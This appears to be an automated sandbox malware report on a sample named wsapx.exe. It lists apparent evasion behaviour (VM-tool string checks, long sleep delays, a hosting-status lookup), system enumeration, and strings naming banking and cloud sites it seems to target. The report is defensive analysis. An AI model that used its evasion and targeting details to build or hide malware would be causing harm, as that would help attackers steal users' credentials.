              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\tree.comWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\tree.comWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\tree.comWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\tree.comWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7743Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1384Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7757Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1353Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7335
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2284
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1573
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3943
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3195
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4550
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2718
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3662
              Source: C:\Users\user\Desktop\wsapx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73722\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73722\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73722\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73722\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73722\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73722\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73722\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73722\python312.dllJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73722\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73722\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73722\_queue.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.dllJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73722\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-18247
              Source: C:\Users\user\Desktop\wsapx.exeAPI coverage: 5.8 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7980Thread sleep count: 7743 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7988Thread sleep count: 1384 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040Thread sleep time: -10145709240540247s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972Thread sleep count: 7757 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972Thread sleep count: 1353 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8044Thread sleep time: -9223372036854770s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8020Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 5144Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep count: 7335 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808Thread sleep count: 2284 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856Thread sleep count: 1573 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3856Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5988Thread sleep count: 3943 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5988Thread sleep count: 3195 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7280Thread sleep time: -11990383647911201s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5028Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808Thread sleep count: 4550 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808Thread sleep count: 2718 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5764Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2612Thread sleep count: 3662 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2612Thread sleep count: 308 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\reg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\tree.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71B83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF7C71B83B0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71B92F0 FindFirstFileExW,FindClose,0_2_00007FF7C71B92F0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71D18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7C71D18E4
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71B92F0 FindFirstFileExW,FindClose,2_2_00007FF7C71B92F0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71D18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF7C71D18E4
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71B83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF7C71B83B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5E46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,110_2_00007FF60E5E46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E6288E0 FindFirstFileExA,110_2_00007FF60E6288E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5DE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,110_2_00007FF60E5DE21C
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94750180 GetSystemInfo,2_2_00007FFD94750180
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: getmac.exe, 00000053.00000002.2390297595.000002A8F57D3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000053.00000003.2388039306.000002A8F57AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
              Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: wsapx.exe, 00000002.00000002.2652361959.000001C879844000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.3404666064.00000266ED243000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.3404815649.00000266ED255000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000053.00000002.2390297595.000002A8F57D3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000053.00000003.2388039306.000002A8F57AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: svchost.exe, 00000017.00000002.3401548411.00000266E7A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: wsapx.exe, 00000002.00000003.2178007249.000001C879DFF000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: wsapx.exe, 00000002.00000003.2178007249.000001C879DFF000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: wsapx.exe, 00000002.00000003.2178007249.000001C879DFF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmware)
              Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: getmac.exe, 00000053.00000002.2390297595.000002A8F57D3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000053.00000003.2388039306.000002A8F57AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport^
              Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: d00qemu-ga
              Source: getmac.exe, 00000053.00000003.2388318674.000002A8F57EB000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000053.00000002.2390297595.000002A8F57EC000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000053.00000003.2388039306.000002A8F57AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: wsapx.exe, 00000002.00000003.2416284679.000001C87AA73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Bz6uGXB1DV0nbobJw9jhNYa0gG/En+48ZFhmCFIXmuZoqiopbM5c3YRODtzXlizVX/mAitADqNeW5oaJtWpjpinGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwsej
              Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: $*fytesvmsrvc
              Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: wsapx.exe, 00000002.00000002.2657140825.000001C87AAA5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2644095050.000001C87AA7D000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2416284679.000001C87AA7D000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2656467781.000001C87AA7F000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2416284679.000001C87AAA5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2353669129.000001C879FD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
